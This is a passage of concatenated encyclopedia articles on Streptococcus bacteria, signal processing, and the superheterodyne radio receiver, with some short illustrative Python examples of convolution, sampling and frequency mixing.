viridans group, and the beta-hemolytic streptococci of Lancefield groups A and B (also known as "group A strep" and "group B strep"). Table: Medically relevant streptococci Alpha-hemolytic When alpha-hemolysis (α-hemolysis) is present, the agar under the colony will appear dark and greenish due to the conversion of hemoglobin to green biliverdin. Streptococcus pneumoniae and a group of oral streptococci (Streptococcus viridans or viridans streptococci) display alpha-hemolysis. Alpha-hemolysis is also termed incomplete hemolysis or partial hemolysis because the cell membranes of the red blood cells are left intact. This is also sometimes called green hemolysis because of the color change in the agar. Pneumococci S. pneumoniae (sometimes called pneumococcus) is a leading cause of bacterial pneumonia and an occasional etiology of otitis media, sinusitis, meningitis, and peritonitis. 
Inflammation is thought to play a major role in how pneumococci cause disease, hence the tendency of diagnoses associated with them to involve inflammation. They possess no Lancefield antigens. The viridans group: alpha-hemolytic The viridans streptococci are a large group of commensal bacteria that are either alpha-hemolytic, producing a green coloration on blood agar plates (hence the name "viridans", from Latin vĭrĭdis, green), or nonhemolytic. They possess no Lancefield antigens. Beta-hemolytic Beta-hemolysis (β-hemolysis), sometimes called complete hemolysis, is a complete lysis of red cells in the media around and under the colonies: the area appears lightened (yellow) and transparent. Streptolysin, an exotoxin, is the enzyme produced by the bacteria that causes the complete lysis of red blood cells. There are two types of streptolysin: streptolysin O (SLO) and streptolysin S (SLS). Streptolysin O is an oxygen-sensitive cytotoxin, secreted by most group A Streptococcus (GAS), that interacts with cholesterol in the membrane of eukaryotic cells (mainly red and white blood cells, macrophages, and platelets) and usually results in beta-hemolysis under the surface of blood agar. Streptolysin S is an oxygen-stable cytotoxin, also produced by most GAS strains, that results in clearing on the surface of blood agar. SLS affects immune cells, including polymorphonuclear leukocytes and lymphocytes, and is thought to prevent the host immune system from clearing infection. Streptococcus pyogenes, or GAS, displays beta-hemolysis. Some weakly beta-hemolytic species cause intense hemolysis when grown together with a strain of Staphylococcus; this is called the CAMP test. Streptococcus agalactiae displays this property. Clostridium perfringens can be identified presumptively with this test. Listeria monocytogenes is also positive on sheep's blood agar. Group A Group A S. pyogenes is the causative agent in a wide range of group A streptococcal infections (GAS). These infections may be noninvasive or invasive. The noninvasive infections tend to be more common and less severe. The most common of these infections include streptococcal pharyngitis (strep throat) and impetigo. Scarlet fever is another example of Group A noninvasive infection. The invasive infections caused by group A beta-hemolytic streptococci tend to be more severe and less common. This occurs when the bacterium is able to infect areas where it is not usually found, such as the blood and organs. The diseases that may be caused include streptococcal toxic shock syndrome, necrotizing fasciitis, pneumonia, and bacteremia. Globally, GAS has been estimated to cause more than 500,000 deaths every year, making it one of the world's leading pathogens. Additional complications may be caused by GAS, namely acute rheumatic fever and acute glomerulonephritis. Rheumatic fever, a disease that affects the joints, kidneys, and heart valves, is a consequence of untreated strep A infection, caused not by the bacterium itself but by the antibodies created by the immune system to fight off the infection cross-reacting with other proteins in the body. This "cross-reaction" causes the body to essentially attack itself and leads to the damage described above. 
A similar autoimmune mechanism initiated by Group A beta-hemolytic streptococcal (GABHS) infection is hypothesized to cause pediatric autoimmune neuropsychiatric disorders associated with streptococcal infections (PANDAS), wherein autoimmune antibodies affect the basal ganglia, causing rapid onset of psychiatric, motor, sleep, and other symptoms in pediatric patients. GAS infection is generally diagnosed with a rapid strep test or by culture. Group B S. agalactiae, or group B streptococcus, GBS, causes pneumonia and meningitis in newborns and the elderly, with occasional systemic bacteremia. Importantly, Streptococcus agalactiae is the most common cause of meningitis in infants from one month to three months old. They can also colonize the intestines and the female reproductive tract, increasing the risk of premature rupture of membranes during pregnancy and of transmission of the organism to the infant. The American College of Obstetricians and Gynecologists, the American Academy of Pediatrics, and the Centers for Disease Control recommend that all pregnant women between 35 and 37 weeks' gestation be tested for GBS. Women who test positive should be given prophylactic antibiotics during labor, which will usually prevent transmission to the infant. Group III polysaccharide vaccines have been proven effective in preventing the passing of GBS from mother to infant. The United Kingdom has chosen to adopt a risk factor-based protocol, rather than the culture-based protocol followed in the US. Current guidelines state that if one or more of the following risk factors is present, then the woman should be treated with intrapartum antibiotics:
GBS bacteriuria during this pregnancy
History of GBS disease in a previous infant
Intrapartum fever (≥38 °C)
Preterm labour (<37 weeks)
Prolonged rupture of membranes (>18 hours)
This protocol results in the administration of intrapartum antibiotics to 15–20% of pregnant women and the prevention of 65–70% of cases of early-onset GBS sepsis. Group C This group includes S. equi, which causes strangles in horses, and S. zooepidemicus — S. equi is a clonal descendant or biovar of the ancestral S. zooepidemicus — which causes infections in several species of mammals, including cattle and horses. S. dysgalactiae subsp. dysgalactiae is also a member of group C, beta-haemolytic streptococci that can cause pharyngitis and other pyogenic infections similar to group A streptococci. Group C streptococcal bacteria are considered zoonotic pathogens, meaning infection can be passed from animal to human. Group D (enterococci) Many former group D streptococci have been reclassified and placed in the genus Enterococcus (including E. faecalis, E. faecium, E. durans, and E. avium). For example, Streptococcus faecalis is now Enterococcus faecalis. E. faecalis is sometimes alpha-hemolytic and E. faecium is sometimes beta-hemolytic. The remaining nonenterococcal group D strains include Streptococcus gallolyticus, Streptococcus bovis, Streptococcus equinus and Streptococcus suis. Nonhemolytic streptococci rarely cause illness. However, weakly hemolytic group D beta-hemolytic streptococci and Listeria monocytogenes (which is actually a gram-positive bacillus) should not be confused with nonhemolytic streptococci. Group F streptococci Group F streptococci were first described in 1934 by Long and Bliss among the "minute haemolytic streptococci". They are also known as Streptococcus anginosus (according to the Lancefield classification system) or as members of the S. 
milleri group (according to the European system). Group G streptococci These streptococci are usually, but not exclusively, beta-hemolytic. Streptococcus dysgalactiae subsp. canis is the predominant subspecies encountered. It is a particularly common GGS in humans, although it is typically found on animals. S. phocae is a GGS subspecies that has been found in marine mammals and marine fish species. In marine mammals it has been mainly associated with meningoencephalitis, sepsis, and endocarditis, but it is also associated with many other pathologies. Its environmental reservoir and means of transmission in marine mammals are not well characterized. Group G streptococci are also considered zoonotic pathogens. Group H streptococci Group H streptococci cause infections in medium-sized canines. Group H streptococci rarely cause human illness unless a human has direct contact with the mouth of a canine. One of the most common ways this can be spread is human-to-canine, mouth-to-mouth contact. However, the canine may lick the human's hand and infection can be spread as well. Clinical identification In clinical practice, the most common groups of Streptococcus can be distinguished by simple bench tests, such as the PYR test for group A streptococcus. There are also latex agglutination kits which can distinguish each of the main groups seen in clinical practice. Treatment Streptococcal infections can be treated with antibiotics from the penicillin family. Most commonly, penicillin or amoxicillin is used to treat strep infection. These antibiotics work by disrupting peptidoglycan production in the cell wall. Treatment most often occurs as a 10-day course of oral antibiotics. For patients with penicillin allergies and those suffering from skin infections, clindamycin can be used. Clindamycin works by disrupting protein synthesis within the cell. Molecular taxonomy and phylogenetics Streptococci have been divided into six groups on the basis of their 16S rDNA sequences: S. anginosus, S. gallolyticus, S. mitis, S. mutans, S. pyogenes and S. salivarius. The 16S groups have been confirmed by whole genome sequencing (see figure). The important pathogens S. pneumoniae and S. pyogenes belong to the S. mitis and S. pyogenes groups, respectively, while the causative agent of dental caries, Streptococcus mutans, is basal to the Streptococcus group. Recent technological advances have resulted in an increase of available genome sequences for Streptococcus species, allowing for more robust and reliable phylogenetic and comparative genomic analyses to be conducted. In 2018, the evolutionary relationships within Streptococcus were re-examined by Patel and Gupta through the analysis of comprehensive phylogenetic trees constructed based on four different datasets of proteins and the identification of 134 highly specific molecular signatures (in the form of conserved signature indels) that are exclusively shared by the entire genus or its distinct subclades. The results revealed the presence of two main clades at the highest level within Streptococcus, termed the "Mitis-Suis" and "Pyogenes-Equinus-Mutans" clades. The "Mitis-Suis" main clade comprises the Suis subclade and the Mitis clade, which encompasses the Anginosus, Pneumoniae, Gordonii and Parasanguinis subclades. The second main clade, the "Pyogenes-Equinus-Mutans", includes the Pyogenes, Mutans, Salivarius, Equinus, Sobrinus, Halotolerans, Porci, Entericus and Orisratti subclades. 
In total, 14 distinct subclades have been identified within the genus Streptococcus, each supported by reliable branching patterns in phylogenetic trees and by the presence of multiple conserved signature indels in different proteins that are distinctive characteristics of the members of these 14 clades. A summary diagram showing the overall relationships among the Streptococcus based on these studies is depicted in a figure on this page. Genomics The genomes of hundreds of species have been sequenced. Most Streptococcus genomes are 1.8 to 2.3 Mb in size and encode 1,700 to 2,300 proteins. Some important genomes are listed in the table. The four species shown in the table (S. pyogenes, S. agalactiae, S. pneumoniae, and S. mutans) have an average pairwise protein sequence identity of about 70%. Bacteriophage Bacteriophages have been described for many species of Streptococcus. 18 prophages have been described in S. pneumoniae that range from 38 to 41 kb in size, encoding from 42 to 66 genes each. Some of the first Streptococcus phages discovered were Dp-1 and ω1 (alias ω-1). In 1981 the Cp (Complutense phage 1, officially Streptococcus virus Cp1, Picovirinae) family was discovered, with Cp-1 as its first member. Dp-1 and Cp-1 infect both S. pneumoniae and S. mitis. However, the host ranges of most Streptococcus phages have not been investigated systematically. Natural genetic transformation Natural genetic transformation involves the transfer of DNA from one bacterium to another through the surrounding medium. Transformation is a complex process dependent on the expression of numerous genes. To be capable of transformation, a bacterium must enter a special physiologic state referred to as competence. S. pneumoniae, S. mitis and S. oralis can become competent, and as a result actively acquire homologous DNA for transformation by a predatory fratricidal mechanism. This fratricidal mechanism mainly exploits non-competent siblings present in the same niche. Among highly competent isolates of S. pneumoniae, Li et al. showed that nasal colonization fitness and virulence (lung infectivity) depend on an intact competence system. Competence may allow the streptococcal pathogen to use external homologous DNA for recombinational repair of DNA damage caused by the host's oxidative attack.
Biology and health sciences
Gram-positive bacteria
Plants
29324
https://en.wikipedia.org/wiki/Signal%20processing
Signal processing
Signal processing is an electrical engineering subfield that focuses on analyzing, modifying and synthesizing signals, such as sound, images, potential fields, seismic signals, altimetry processing, and scientific measurements. Signal processing techniques are used to optimize transmissions and digital storage efficiency, correct distorted signals, improve subjective video quality, and detect or pinpoint components of interest in a measured signal. History According to Alan V. Oppenheim and Ronald W. Schafer, the principles of signal processing can be found in the classical numerical analysis techniques of the 17th century. They further state that the digital refinement of these techniques can be found in the digital control systems of the 1940s and 1950s. In 1948, Claude Shannon wrote the influential paper "A Mathematical Theory of Communication" which was published in the Bell System Technical Journal. The paper laid the groundwork for later development of information communication systems and the processing of signals for transmission. Signal processing matured and flourished in the 1960s and 1970s, and digital signal processing became widely used with specialized digital signal processor chips in the 1980s. Definition of a signal A signal is a function x(t), where this function is either deterministic (then one speaks of a deterministic signal) or a path (x_t), t ∈ T, that is, a realization of a stochastic process (X_t), t ∈ T. Categories Analog Analog signal processing is for signals that have not been digitized, as in most 20th-century radio, telephone, and television systems. This involves linear electronic circuits as well as nonlinear ones. The former are, for instance, passive filters, active filters, additive mixers, integrators, and delay lines. Nonlinear circuits include compandors, multipliers (frequency mixers, voltage-controlled amplifiers), voltage-controlled filters, voltage-controlled oscillators, and phase-locked loops. Continuous time Continuous-time signal processing is for signals that vary with the change of continuous domain (without considering some individual interrupted points). The methods of signal processing include time domain, frequency domain, and complex frequency domain. This technology mainly discusses the modeling of a linear time-invariant continuous system, integral of the system's zero-state response, setting up system function and the continuous time filtering of deterministic signals. For example, in the time domain, a continuous-time signal x(t) passing through a linear time-invariant filter/system with impulse response h(t) can be expressed at the output as y(t) = ∫ h(τ) x(t − τ) dτ, with the integral taken over all τ. In some contexts, h(t) is referred to as the impulse response of the system. The above convolution operation is conducted between the input and the system. Discrete time Discrete-time signal processing is for sampled signals, defined only at discrete points in time, and as such are quantized in time, but not in magnitude. Analog discrete-time signal processing is a technology based on electronic devices such as sample and hold circuits, analog time-division multiplexers, analog delay lines and analog feedback shift registers. This technology was a predecessor of digital signal processing (see below), and is still used in advanced processing of gigahertz signals. The concept of discrete-time signal processing also refers to a theoretical discipline that establishes a mathematical basis for digital signal processing, without taking quantization error into consideration. 
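The discrete-time counterpart of the convolution above is y[n] = Σₖ h[k]·x[n − k]. A minimal sketch implementing it directly, with a 3-tap moving average as an illustrative filter:

```python
# Sketch: discrete convolution, y[n] = sum_k h[k] * x[n-k].
def convolve(x, h):
    """Full discrete convolution of input x with impulse response h."""
    y = [0.0] * (len(x) + len(h) - 1)
    for n in range(len(y)):
        for k in range(len(h)):
            if 0 <= n - k < len(x):
                y[n] += h[k] * x[n - k]
    return y

# A 3-tap moving-average filter smoothing a step input:
x = [0, 0, 1, 1, 1, 1]
h = [1 / 3, 1 / 3, 1 / 3]
print([round(v, 2) for v in convolve(x, h)])
```

The printed output ramps from 0 to 1 over three samples, showing how the impulse response h fully characterizes a linear time-invariant system's behavior. Library routines (e.g. FFT-based convolution) do the same computation more efficiently.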
Digital Digital signal processing is the processing of digitized discrete-time sampled signals. Processing is done by general-purpose computers or by digital circuits such as ASICs, field-programmable gate arrays or specialized digital signal processors. Typical arithmetical operations include fixed-point and floating-point, real-valued and complex-valued, multiplication and addition. Other typical operations supported by the hardware are circular buffers and lookup tables. Examples of algorithms are the fast Fourier transform (FFT), finite impulse response (FIR) filter, infinite impulse response (IIR) filter, and adaptive filters such as the Wiener and Kalman filters. Nonlinear Nonlinear signal processing involves the analysis and processing of signals produced from nonlinear systems and can be in the time, frequency, or spatiotemporal domains. Nonlinear systems can produce highly complex behaviors including bifurcations, chaos, harmonics, and subharmonics which cannot be produced or analyzed using linear methods. Polynomial signal processing is a type of non-linear signal processing, where polynomial systems may be interpreted as conceptually straightforward extensions of linear systems to the nonlinear case. Statistical Statistical signal processing is an approach which treats signals as stochastic processes, utilizing their statistical properties to perform signal processing tasks. Statistical techniques are widely used in signal processing applications. For example, one can model the probability distribution of the noise incurred when photographing an image, and construct techniques based on this model to reduce the noise in the resulting image. Application fields Audio signal processing for electrical signals representing sound, such as speech or music Image processing in digital cameras, computers and various imaging systems Video processing for interpreting moving pictures Wireless communication waveform generation, demodulation, filtering, and equalization Control systems Array processing for processing signals from arrays of sensors Process control, in which a variety of signals are used, including the industry-standard 4–20 mA current loop Seismology Feature extraction, such as image understanding and speech recognition. Quality improvement, such as noise reduction, image enhancement, and echo cancellation. Source coding including audio compression, image compression, and video compression. Genomic signal processing In geophysics, signal processing is used to enhance the signal relative to the noise within time-series measurements of geophysical data. Processing is conducted within either the time domain or frequency domain, or both. In communication systems, signal processing may occur at: OSI layer 1 in the seven-layer OSI model, the physical layer (modulation, equalization, multiplexing, etc.); OSI layer 2, the data link layer (forward error correction); OSI layer 6, the presentation layer (source coding, including analog-to-digital conversion and data compression). Typical devices Filters, for example analog (passive or active) or digital (FIR, IIR, frequency-domain, or stochastic filters, etc.) Samplers and analog-to-digital converters for signal acquisition and reconstruction, which involves measuring a physical signal, storing or transferring it as a digital signal, and possibly later rebuilding the original signal or an approximation thereof.
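Sampling, as performed by the samplers and analog-to-digital converters just listed, preserves a signal only when the sampling rate exceeds twice the highest signal frequency. A minimal sketch (NumPy assumed; all frequencies are arbitrary illustrative values) shows how undersampling makes two different tones produce identical samples (aliasing):

```python
import numpy as np

f_sig = 7.0          # signal frequency in Hz (illustrative)
fs_good = 50.0       # sampling rate comfortably above the Nyquist rate (14 Hz)
fs_bad = 10.0        # undersampling: below the Nyquist rate

# Sampling x(t) = sin(2*pi*f*t) at rate fs gives x[n] = sin(2*pi*f*n/fs).
n_good = np.arange(50)
n_bad = np.arange(10)
x_good = np.sin(2 * np.pi * f_sig * n_good / fs_good)
x_bad = np.sin(2 * np.pi * f_sig * n_bad / fs_bad)

# When fs < 2*f, the samples exactly match those of the aliased
# frequency f - fs = -3 Hz, so reconstruction recovers the wrong tone.
alias = np.sin(2 * np.pi * (f_sig - fs_bad) * n_bad / fs_bad)
print(np.allclose(x_bad, alias))   # True
```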
Signal compressors Digital signal processors (DSPs) Mathematical methods applied Differential equations, for modeling system behavior, connecting input and output relations in linear time-invariant systems. For instance, a low-pass filter such as an RC circuit can be modeled as a differential equation in signal processing, which allows one to compute the continuous output signal as a function of the input or initial conditions (a numerical sketch follows at the end of this list). Recurrence relations Transform theory Time-frequency analysis for processing non-stationary signals Linear canonical transformation Spectral estimation for determining the spectral content (i.e., the distribution of power over frequency) of a time series Statistical signal processing, analyzing and extracting information from signals and noise based on their stochastic properties Linear time-invariant system theory, and transform theory Polynomial signal processing, analysis of systems which relate input and output using polynomials System identification and classification Calculus Complex analysis Vector spaces and linear algebra Functional analysis Probability and stochastic processes Detection theory Estimation theory Optimization Numerical methods Time series Data mining, for statistical analysis of relations between large quantities of variables (in this context representing many physical signals), to extract previously unknown interesting patterns
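As referenced above, a first-order RC low-pass obeys the differential equation RC·dy/dt + y(t) = x(t). The following is a minimal forward-Euler sketch (the component values are arbitrary assumptions) that computes the output from the input and an initial condition:

```python
import numpy as np

R, C = 1_000.0, 1e-6           # 1 kOhm, 1 uF (illustrative values) -> tau = 1 ms
tau = R * C
dt = 1e-5                      # integration step, well below tau for stability
t = np.arange(0, 0.01, dt)
x = np.where(t >= 0.001, 1.0, 0.0)   # unit step applied at t = 1 ms

# Forward-Euler solution of RC * dy/dt + y = x, with y(0) = 0:
# dy/dt = (x - y) / tau.
y = np.zeros_like(t)
for k in range(1, t.size):
    y[k] = y[k - 1] + dt * (x[k - 1] - y[k - 1]) / tau
# y rises exponentially toward 1 with time constant tau, as expected.
```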
Technology
Basics_4
null
29341
https://en.wikipedia.org/wiki/Superheterodyne%20receiver
Superheterodyne receiver
A superheterodyne receiver, often shortened to superhet, is a type of radio receiver that uses frequency mixing to convert a received signal to a fixed intermediate frequency (IF) which can be more conveniently processed than the original carrier frequency. It was invented by French radio engineer and radio manufacturer Lucien Lévy. Virtually all modern radio receivers use the superheterodyne principle. Precursors Early radio Early Morse code radio broadcasts were produced using an alternator connected to a spark gap. The output signal was at a carrier frequency defined by the physical construction of the gap, modulated by the alternating current signal from the alternator. Since the output frequency of the alternator was generally in the audible range, this produced an audible amplitude-modulated (AM) signal. Simple radio detectors filtered out the high-frequency carrier, leaving the modulation, which was passed on to the user's headphones as an audible signal of dots and dashes. In 1904, Ernst Alexanderson introduced the Alexanderson alternator, a device that directly produced radio frequency output with higher power and much higher efficiency than the older spark gap systems. In contrast to the spark gap, however, the output from the alternator was a pure carrier wave at a selected frequency. When detected on existing receivers, the dots and dashes would normally be inaudible, or "supersonic". Due to the filtering effects of the receiver, these signals generally produced a click or thump, which was audible but made distinguishing dots from dashes difficult. In 1905, Canadian inventor Reginald Fessenden came up with the idea of using two Alexanderson alternators operating at closely spaced frequencies to broadcast two signals, instead of one. The receiver would then receive both signals, and as part of the detection process, only the beat frequency would exit the receiver. By selecting two carriers close enough that the beat frequency was audible, the resulting Morse code could once again be easily heard even in simple receivers. For instance, if the two alternators operated at frequencies 3 kHz apart, the output in the headphones would be dots or dashes of 3 kHz tone, making them easily audible. Fessenden coined the term "heterodyne", meaning "generated by a difference" (in frequency), to describe this system. The word is derived from the Greek roots hetero- "different" and -dyne "power". Regeneration Morse code was widely used in the early days of radio because it was both easy to produce and easy to receive. In contrast to voice broadcasts, the output of the amplifier did not have to closely match the modulation of the original signal. As a result, any number of simple amplification systems could be used. One method used an interesting side effect of early triode amplifier tubes. If both the plate (anode) and grid were connected to resonant circuits tuned to the same frequency and the stage gain was much higher than unity, stray capacitive coupling between the grid and the plate would cause the amplifier to go into oscillation. In 1913, Edwin Howard Armstrong described a receiver system that used this effect to produce audible Morse code output using a single triode. The output of the amplifier taken at the anode was connected back to the input through a "tickler", causing feedback that drove the stage's gain well beyond unity. This caused the output to oscillate at a chosen frequency with great amplification.
When the original signal cut off at the end of the dot or dash, the oscillation decayed and the sound disappeared after a short delay. Armstrong referred to this concept as a regenerative receiver, and it immediately became one of the most widely used systems of its era. Many radio systems of the 1920s were based on the regenerative principle, and it continued to be used in specialized roles into the 1940s, for instance in the IFF Mark II. Radio direction finding There was one role where the regenerative system was not suitable, even for Morse code sources, and that was the task of radio direction finding, RDF. The regenerative system was highly non-linear, amplifying any signal above a certain threshold by a huge amount, sometimes so much that it turned the receiver into a transmitter (which was the entire basis of the original IFF system). In RDF, the strength of the signal is used to determine the location of the transmitter, so one requires linear amplification to allow the strength of the original signal, often very weak, to be accurately measured. To address this need, RDF systems of the era used triode amplifiers operating below unity gain. To get a usable signal from such a system, tens or even hundreds of triodes had to be used, connected together anode-to-grid. These amplifiers drew enormous amounts of power and required a team of maintenance engineers to keep them running. Nevertheless, the strategic value of direction finding on weak signals was so high that the British Admiralty felt the high cost was justified. History Conceptualisation Although a number of researchers discovered the superheterodyne concept, filing patents only months apart, American engineer Edwin Armstrong is often credited with the concept. He came across it while considering better ways to produce RDF receivers. He had concluded that moving to higher "short wave" frequencies would make RDF more useful and was looking for practical means to build a linear amplifier for these signals. At the time, short wave was anything above about 500 kHz, beyond any existing amplifier's capabilities. It had been noticed that when a regenerative receiver went into oscillation, other nearby receivers would start picking up other stations as well. Armstrong (and others) eventually deduced that this was caused by a "supersonic heterodyne" between the station's carrier frequency and the regenerative receiver's oscillation frequency. When the first receiver began to oscillate at high outputs, its signal would flow back out through the antenna to be received on any nearby receiver. On that receiver, the two signals mixed just as they did in the original heterodyne concept, producing an output that is the difference in frequency between the two signals. For instance, consider a lone receiver that was tuned to a station at 300 kHz. If a second receiver is set up nearby and set to 400 kHz with high gain, it will begin to give off a 400 kHz signal that will be received in the first receiver. In that receiver, the two signals will mix to produce four outputs, one at the original 300 kHz, another at the received 400 kHz, and two more, the difference at 100 kHz and the sum at 700 kHz. This is the same effect that Fessenden had proposed, but in his system the two frequencies were deliberately chosen so the beat frequency was audible. In this case, all of the frequencies are well beyond the audible range, and thus "supersonic", giving rise to the name superheterodyne.
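Armstrong's numerical example is easy to verify. As a minimal sketch (NumPy assumed; the frequencies are scaled down from kHz to Hz only so the simulation stays short), an ideal multiplying mixer applied to two carriers produces exactly the difference and sum frequencies:

```python
import numpy as np

fs = 10_000.0                            # sample rate, Hz
t = np.arange(0, 1.0, 1 / fs)
station = np.sin(2 * np.pi * 300 * t)    # stands in for the 300 kHz station
local = np.sin(2 * np.pi * 400 * t)      # stands in for the 400 kHz oscillation

# An ideal multiplying mixer: sin(a)*sin(b) = 0.5*[cos(a-b) - cos(a+b)],
# so the product contains the difference (100) and sum (700) frequencies.
mixed = station * local
spectrum = np.abs(np.fft.rfft(mixed))
freqs = np.fft.rfftfreq(t.size, 1 / fs)
print(freqs[spectrum > spectrum.max() / 2])   # ~[100., 700.]
```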
Armstrong realized that this effect was a potential solution to the "short wave" amplification problem, as the "difference" output still retained its original modulation, but on a lower carrier frequency. In the example above, one can amplify the 100 kHz beat signal and retrieve the original information from it; the receiver does not have to tune in the higher 300 kHz original carrier. By selecting an appropriate set of frequencies, even very high-frequency signals could be "reduced" to a frequency that could be amplified by existing systems. For instance, to receive a signal at 1500 kHz, far beyond the range of efficient amplification at the time, one could set up an oscillator at, for example, 1560 kHz. Armstrong referred to this as the "local oscillator" or LO. As its signal was being fed into a second receiver in the same device, it did not have to be powerful, generating only enough signal to be roughly similar in strength to that of the received station, although in practice LOs tend to be relatively strong signals. When the signal from the LO mixes with the station's, one of the outputs will be the heterodyne difference frequency, in this case 60 kHz. He termed this resulting difference the "intermediate frequency", often abbreviated to "IF". In December 1919, Major E. H. Armstrong gave publicity to an indirect method of obtaining short-wave amplification, called the super-heterodyne. The idea is to reduce the incoming frequency, which may be, for example, 1,500,000 cycles (200 meters), to some suitable super-audible frequency that can be amplified efficiently, then passing this current through an intermediate frequency amplifier, and finally rectifying and carrying on to one or two stages of audio frequency amplification. The "trick" to the superheterodyne is that by changing the LO frequency you can tune in different stations. For instance, to receive a signal at 1300 kHz, one could tune the LO to 1360 kHz, resulting in the same 60 kHz IF. This means the amplifier section can be tuned to operate at a single frequency, the design IF, which is much easier to do efficiently. Development Armstrong put his ideas into practice, and the technique was soon adopted by the military. It was less popular when commercial radio broadcasting began in the 1920s, mostly due to the need for an extra tube (for the oscillator), the generally higher cost of the receiver, and the level of skill required to operate it. For early domestic radios, tuned radio frequency (TRF) receivers were more popular because they were cheaper, easier for a non-technical owner to use, and less costly to operate. Armstrong eventually sold his superheterodyne patent to Westinghouse, which then sold it to the Radio Corporation of America (RCA), the latter monopolizing the market for superheterodyne receivers until 1930. Because the original motivation for the superhet was the difficulty of using the triode amplifier at high frequencies, there was an advantage in using a lower intermediate frequency. During this era, many receivers used an IF of only 30 kHz. These low IF frequencies, often using IF transformers based on the self-resonance of iron-core transformers, had poor image frequency rejection, but overcame the difficulty of using triodes at radio frequencies in a manner that competed favorably with the less robust neutrodyne TRF receiver.
Higher IF frequencies (455 kHz was a common standard) came into use in later years, after the invention of the tetrode and pentode as amplifying tubes, largely solving the problem of image rejection. Even later, however, low IF frequencies (typically 60 kHz) were again used in the second (or third) IF stage of double- or triple-conversion communications receivers to take advantage of the selectivity more easily achieved at lower IF frequencies, with image rejection accomplished in the earlier IF stage(s), which were at a higher IF frequency. In the 1920s, at these low frequencies, commercial IF filters looked very similar to 1920s audio interstage coupling transformers, had similar construction, and were wired up in an almost identical manner, so they were referred to as "IF transformers". By the mid-1930s, superheterodynes using much higher intermediate frequencies (typically around 440–470 kHz) used tuned transformers more similar to other RF applications, but the name "IF transformer" was retained. Modern receivers typically use a mixture of ceramic resonators or surface acoustic wave resonators and traditional tuned-inductor IF transformers. By the 1930s, improvements in vacuum tube technology rapidly eroded the TRF receiver's cost advantages, and the explosion in the number of broadcasting stations created a demand for cheaper, higher-performance receivers. Vacuum tubes with an additional grid were introduced before the more modern screen-grid tetrode; among them was a tetrode with two control grids, a tube that combined the mixer and oscillator functions, first used in the so-called autodyne mixer. This was rapidly followed by the introduction of tubes specifically designed for superheterodyne operation, most notably the pentagrid converter. By reducing the tube count (with each tube stage being the main factor affecting cost in this era), this further reduced the advantage of TRF and regenerative receiver designs. By the mid-1930s, commercial production of TRF receivers was largely replaced by superheterodyne receivers. By the 1940s, the vacuum-tube superheterodyne AM broadcast receiver was refined into a cheap-to-manufacture design called the "All American Five" because it used five vacuum tubes: usually a converter (mixer/local oscillator), an IF amplifier, a detector/audio amplifier, an audio power amplifier, and a rectifier. Since that time, the superheterodyne design has been used for almost all commercial radio and TV receivers. Patent battles French engineer Lucien Lévy filed a patent application for the superheterodyne principle in August 1917 with brevet n° 493660. Armstrong also filed his patent in 1917. Lévy filed his original disclosure about seven months before Armstrong's. German inventor Walter H. Schottky also filed a patent in 1918. At first the US recognized Armstrong as the inventor, and his US Patent 1,342,885 was issued on 8 June 1920. After various changes and court hearings, Lévy was awarded US patent No 1,734,938, which included seven of the nine claims in Armstrong's application, while the two remaining claims were granted to Alexanderson of GE and Kendall of AT&T. Principle of operation The antenna collects the radio signal. The tuned RF stage with optional RF amplifier provides some initial selectivity; it is necessary to suppress the image frequency, and may also serve to prevent strong out-of-passband signals from saturating the initial amplifier.
A local oscillator provides the mixing frequency; it is usually a variable-frequency oscillator, which is used to tune the receiver to different stations. The frequency mixer does the actual heterodyning that gives the superheterodyne its name; it changes the incoming radio frequency signal to a higher or lower, fixed, intermediate frequency (IF). The IF band-pass filter and amplifier supply most of the gain and the narrowband filtering for the radio. The demodulator extracts the audio or other modulation from the IF signal. The extracted signal is then amplified by the audio amplifier. Circuit description To receive a radio signal, a suitable antenna is required. The output of the antenna may be very small, often only a few microvolts. The signal from the antenna is tuned and may be amplified in a so-called radio frequency (RF) amplifier, although this stage is often omitted. One or more tuned circuits at this stage block frequencies that are far removed from the intended reception frequency. To tune the receiver to a particular station, the frequency of the local oscillator is controlled by the tuning knob (for instance). Tuning of the local oscillator and the RF stage may use a variable capacitor or a varicap diode. The tuning of one (or more) tuned circuits in the RF stage must track the tuning of the local oscillator. Local oscillator and mixer The signal is then fed into a circuit where it is mixed with a sine wave from a variable-frequency oscillator known as the local oscillator (LO). The mixer uses a non-linear component to produce both sum and difference beat frequency signals, each one containing the modulation in the desired signal. The output of the mixer may include the original RF signal at fRF, the local oscillator signal at fLO, and the two new heterodyne frequencies fRF + fLO and fRF − fLO. The mixer may inadvertently produce additional frequencies, such as third- and higher-order intermodulation products. Ideally, the IF bandpass filter removes all but the desired IF signal at fIF. The IF signal contains the original modulation (transmitted information) that the received radio signal had at fRF. The frequency of the local oscillator fLO is set so the desired reception radio frequency fRF mixes to fIF. There are two choices for the local oscillator frequency because of the correspondence between positive and negative frequencies. If the local oscillator frequency is less than the desired reception frequency, it is called low-side injection (fIF = fRF − fLO); if the local oscillator is higher, then it is called high-side injection (fIF = fLO − fRF). The mixer will process not only the desired input signal at fRF, but also all signals present at its inputs. There will be many mixer products (heterodynes). Most other signals produced by the mixer (such as those due to stations at nearby frequencies) can be filtered out in the IF tuned amplifier; that gives the superheterodyne receiver its superior performance. However, if fLO is set to fRF + fIF, then an incoming radio signal at fLO + fIF will also produce a heterodyne at fIF; the frequency fLO + fIF is called the image frequency and must be rejected by the tuned circuits in the RF stage. The image frequency is 2fIF higher (or lower) than the desired frequency fRF, so employing a higher IF frequency fIF increases the receiver's image rejection without requiring additional selectivity in the RF stage. To suppress the unwanted image, the tuning of the RF stage and the LO may need to "track" each other.
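A small helper (hypothetical function and parameter names; Python used here purely for illustration) makes the high-side relationships above explicit:

```python
def high_side_plan(f_rf_hz: float, f_if_hz: float) -> dict:
    """Frequency plan for high-side injection: fLO = fRF + fIF.

    The image lies 2*fIF above the wanted signal, since
    (fRF + 2*fIF) - fLO = fIF as well.
    """
    f_lo = f_rf_hz + f_if_hz
    f_image = f_rf_hz + 2 * f_if_hz
    return {"f_lo": f_lo, "f_image": f_image}

# Example: a 580 kHz station with a 455 kHz IF gives a 1035 kHz LO and a
# 1490 kHz image (the case worked numerically later in the article).
print(high_side_plan(580e3, 455e3))   # {'f_lo': 1035000.0, 'f_image': 1490000.0}
```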
